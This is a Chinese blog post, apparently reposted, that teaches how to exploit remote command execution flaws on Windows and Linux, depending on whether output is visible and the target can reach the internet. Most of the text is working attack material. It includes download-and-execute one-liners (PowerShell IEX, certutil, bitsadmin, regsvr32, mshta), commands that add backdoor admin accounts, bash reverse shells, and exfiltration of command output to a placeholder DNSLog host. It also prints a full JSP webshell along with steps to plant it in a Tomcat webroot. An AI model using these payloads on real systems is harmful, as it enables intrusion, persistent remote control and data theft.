首页 > 其他分享 >【命令执行漏洞】(无)回显(不)出网利用技巧

【命令执行漏洞】(无)回显(不)出网利用技巧

时间:2024-09-04 12:17:36浏览次数:4  
标签:webshell 回显 路径 js 漏洞 yokan test txt 出网

一、 前言

二、 判断目标操作系统

三、Windows下的命令执行
    3.1 有回显出网
    3.2 有回显不出网 
    3.3 无回显出网
    3.4 无回显不出网
   
四、Linux下的命令执行
    4.1 有回显出网
    4.2 有回显不出网
    4.3 无回显出网
    4.4 无回显不出网

一、 前言

远程命令执行类漏洞在漏洞利用阶段关注的问题主要是三个:目标操作系统类型执行命令结果是否有回显以及是否能通外网
针对不同的操作系统,执行命令各有差异。另外,目标是否有回显是漏洞利用的难易程度的关键因素之一。
最后目标是否能通外网也是直接影响漏洞利用的关键因素,如果漏洞无回显并且也不通外网,那漏洞利用难度就大大增加了。
以下就远程命令执行漏洞的利用技巧做一个简单的总结。

二、 判断目标操作系统

对于有回显/出网的情况就很好判断了。

这里介绍无回显不出网情况下的判断方法:

ping命令在Linux和Win中的参数不同,“要发送的回显请求数”  在Linux中为-c参数,Win中为-n参数
Windows下的Ping命令每间隔一秒会发送一个ICMP ECHO_REQUEST 包,因此可以利用 Ping 命令来近似地模拟等待指定秒数的效果


应该目标通过 ping -n产生了相应的延时,则说明是Windows系统,反则Linux系统

三、Windows下的命令执行

3.1 有回显出网

这种场景是最简单的,以下简单总结一些常见的拿权限的方法或思路

方法一

确认Web应用物理路径,然后写入webshell
这个应该是【最经常】用到的。
这里介绍一下【通用】的确认web路径的方法:
首先,找到一个特殊的文件,这里以yokan_test.js为例,然后使用如下命令查询:

dir /s/a-d/b yokan_test.js

/s查找当前目录以及所有子目录下的文件(包含子文件夹)

/b舍弃标题与摘要内容(带上就对了)

/a [[:] Attributes]只显示指定属性的目录名和文件名

/a-d 只显示文件,而非目录(省略了冒号,打全了是/a:-d)

dir /x /s /b yokan_test.js
for /r c:\ %i in (yokan_test.js*) do @echo %i

另一个问题就是写入webshell的时候需要考虑webshell特殊符号问题,可以先做base64编码写入,然后再解码

方法二

远程下载并执行
远程下载的方法很多,简单罗列几个:

# powershell
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/p'))"
# certutil
certutil -urlcache -split -f http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe
# bitsadmin
bitsadmin /transfer n http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe
# regsvr32
regsvr32 /s /n /u /i:http://x.x.x.x/r scrobj.dll
# mshta
mshta  http://x.x.x.x/test.hta

方法三

添加账号
如果目标开放远程桌面端口【3389】的话,并且权限足够可以直接执行命令添加账号

net user test test@123qaz /add
net localgroup administrators test /add

或者启用guest账号:

net user guest /active:yes
net user guest guest@123qaz
net localgroup administrators guest /add

3.2 有回显不出网

针对这种场景,解决方法就比较灵活了。因为不通外网,所以主思路还是想办法写入webshell。

1.确认Web应用物理路径

dir /s/a-d/b /WEB-INF/web.xml
for /r c:\ %i in (checkCode.js*) do @echo %i

当你在Windows命令提示符下运行这个命令时,它会在以"C:"为根目录的目录树中搜索文件名以"yokan_test.js"开头的文件。

for /r 是一个循环命令,它会递归地遍历指定目录及其子目录中的文件。

c:\ 是指定的根目录,表示从C盘开始搜索。

%i 是一个循环变量,它在每次循环中代表找到的文件路径。

(yokan_test.js*) 是一个通配符模式,用于匹配文件名以"yokan_test.js"开头的文件。* 是通配符,表示匹配任意字符。

@echo %i 是一个输出命令,它会将找到的文件路径打印到命令提示符窗口。

因此,当你运行这个命令时,它会遍历目录树,找到所有以"yokan_test.js"开头的文件,并将它们的路径输出到命令提示符窗口。

2.写入webshell,需要考虑webshell特殊符号问题,可以先做base64编码写入


echo
 -----BEGIN CERTIFICATE----- 
>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt&&echo
 
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="110";String cs="UTF-8";String EC(String s)throws Exception{return new String(s.getBytes("ISO-8859-1"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0; i<l.length; i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ +=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k < x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i<d.length();i+=2){os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j<z.length; j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\r\n");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split("\r\n");ResultSet r=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null,"%",new String[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i <=n; i++){sb.append(d.getColumnName(i)+"\t|\t");}sb.append("\r\n");if(q.indexOf("--f:")!=-1){File file=new File(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i<=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"\t");bw.flush();}else{sb.append(r.getObject(i)+""+"\t|\t");}}if(bw!=null){bw.newLine();}sb.append("\r\n");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}%><%cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer("");try{String Z=EC(request.getParameter(Pwd)+"");String z1=EC(request.getParameter("z1")+"");String z2=EC(request.getParameter("z2")+"");sb.append("->"+"|");String s=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\","/")+"images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>
 
>>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt&&echo
 -----END CERTIFICATE----- 
>>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt

3.使用certutil解码

certutil -decode D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.jsp

3.3 无回显出网

我们的最终还是要写入webshell或者远程下载exe执行。
远程下载的话,直接盲下到特殊路径就可以。
但是要写webshell首先要确认web路径,
这里有两种方法:
这里以 yokan_test.js 为例:
第一,利用特殊的文件定位Web路径并将路径写入特殊文件同目录下的txt文件

for /f %i in ('dir /x /s /b yokan_test.js') do (echo %i>%i.path.txt)

第二,利用特殊的文件定位Web路径并将结果发送至DNSLog

for /r c:\ %i in (yokan_test.js*) do certutil -urlcache -split -f http://x.x.x.x/%i

当然,可以发送路径,也可以直接执行命令

for /f %i in ('dir /x /s /b yokan_test.js') do (ipconfig >%i.ipconfig.txt)

for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i  
#执行whoami命令并将结果发送至DNSLog

3.4 无回显不出网

当然,依旧确认Web应用物理路径,然后写入webshell。
找web路径的方法和【无回显出网】条件下的第一种方法一样:
例如:
定位Web特殊文件路径并将路径写入当前目录下的txt文件

cmd /c "for /f %i in ('dir /x /s /b index.html') do (echo%i>%i.path.txt)%26(ipconfig>%i.ipconfig.txt)"

其中index.html.path.txt为路径:

index.html.ipconfig.txt为ifconfig执行的命令结果:

有了路径我们就可以直接写webshell

四、Linux下的命令执行

4.1 有回显出网

方法一

确认Web应用物理路径,然后写入webshell

1.执行pwd、ls等命令确认一下Web路径在哪里

也可以用下面无回显条件下介绍的寻找web路径方法[寻找特殊web文件的路径

2.写入webshell

echo命令直接写入webshell

echo webshell的base64编码内容 |base64 -d > Web应用目录/test.jsp

方法二

反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

方法很多,就不一一列出了

4.2 有回显不出网

解决方法就比较灵活了。因为不通外网,所以主思路还是想办法写入webshell,利用方法与 有回显不出网 方法一 无异

4.3 无回显出网

方法一

直接反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

方法二

确认Web应用物理路径,然后写入webshell

1.定位Web应用目录

① find 特殊js
寻找一个特殊的文件,例如yokan_test.js,利用find寻找这个文件的路径,并将路径输出到与这个文件相同的路径下。

find . -type f -name yokan_test.js|while read f;do echo $f >$(dirname $f)/test.txt;done

② locate 特殊js
locate和find 不同, find 可以在硬盘找,locate只能在/var/lib/slocate资料库中找。一般情况下locate的速度会比find快,主要是因为locate并不是真的查找,而是查数据库

locate yokan_test.js|while read f;do echo $f >$(dirname $f)//test1.txt;done

③dnslog

wget http://x.x.x.x/`pwd|base64`  
#大致确认一下当前目录,再通过ls、cd等命令获取Web应用目录,并发送结果至DNSLog

2.写入webshell

根据1,知道了web路径,直接写webshell即可

echo webshell的base64编码内容 |base64 -d > Web应用目录/test.jsp  #echo命令直接写入webshell

4.4 无回显不出网

主要是寻找web路径写webshell,方法和 无回显出网方法二 相同

方法一

find

find 命令:find . -type f -name 1.js

既然可以查找到js文件,那我们直接将写文件的拼接起来即可,将id,pwd,hostname的结果写在js/test1.txt中,命令

find . -type f -name 1.js|while read f;do sh -c 'id;pwd;hostname;/sbin/ifconfig' >$(dirname $f)/test.txt;done

效果可参考下图:

方法二

locate

在可以查找到js文件的条件下,我们可以直接将写的文件进行拼接,将id,pwd,hostname的结果写在js/test1.txt中,再访问xxx.com/js/test1.txt即可。
这里需要我们熟悉基本的命令编写及修改。

locate /js/1.js|while read f;do sh -c 'id;pwd;ifconfig'>$(dirname $f)/test1.txt;done

命令效果参考下图:

标签:webshell,回显,路径,js,漏洞,yokan,test,txt,出网
From: https://www.cnblogs.com/o-O-oO/p/18396202

相关文章

  • 护网漏洞复现(二)
    JieLink+智能终端操作平台多个接口存在敏感信息泄露漏洞描述:JieLink+智能终端操作平台多个接口存在此漏洞,攻击者可以利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。fofa语法:title="JieLink+智能终端操作平台"POC:1、http://xxx.xxx.xxx.xxx/repo......
  • 护网漏洞复现(三)
    Mtab书签导航程序LinkStoregetlcon存在SQL注入漏洞描述:Mtab书签导航程序LinkStore/getIcon接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步......
  • 护网漏洞复现
    金程云OAUploadFile存在任意文件上传漏洞描述:金程云OAUploadFile存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。fofa语法:body="images/yipeoplehover.png"POC:POST/OA/api/2.0/Common/AttachFi......
  • 春秋云镜-RCE靶场漏洞复现
    CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行......
  • Pikachu文件包含漏洞(本地和远程)
    一、本地文件包含打开靶场,选择一个查看读取一个本地文件查看二、远程文件包含在云服务器创建一个txt文件写入<?phpfputs(fopen("shell.php","w"),'<?phpeval($_POST["cmd"]);?>')?>在本机上查看,会生成一个6.php,使用蚁剑连接查看......
  • 应用程序报错漏洞修复
    漏洞描述错误页面由服务器产生400、403、404、500等错误时,返回详细错误信息。报错信息中可能会包含服务器代码信息、服务器版本信息、模板类型、数据库连接信息、SQL语句或者敏感文件的路径。修复修改nginx配置#其他配置...server{#其他配置...#指定400......
  • pikachu文件包含漏洞靶场
    Fileinclusion(local)创建1.php步骤一:选择一个球员提交../../../../1.phpFileInclusion(remote)(远程文件包含)步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include;步骤二:选择球员步骤三:宝塔公网上创建一个6.txt文......
  • pikachu文件包含漏洞靶场攻略
    1.Fileinclusion(local)(本地文件包含)步骤一:选择一个球员提交步骤二:filename后面输入../../../../shw.php访问php文件2.FileInclusion(remote)(远程文件包含)步骤一:修改配置远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on//默认打开Allow_url_include=on/......
  • vue2+html2canvas+jspdf 导出网页
    `asynchandlePreview(){constpdf=awaitthis.exportToPdf()//使用浏览器预览PDF-安全策略有缺陷constpdfDataURI=pdf.output('datauristring')window.open(pdfDataURI,'_blank','location=no');},asynchandleDown(){constpdf=awai......
  • 蜂信物联 FastBee 开源物联网平台 download 任意文件读取漏洞复现
    1产品简介蜂信物联(FastBee)开源物联网平台是一个专为物联网应用设计的综合性平台,它集成了硬件接入、数据管理、应用开发等一系列功能,为用户提供了一个完整、便捷的物联网解决方案。平台以其简单易用、功能强大、高度可扩展和安全性高的特点,为物联网应用的发展提供了有力支持......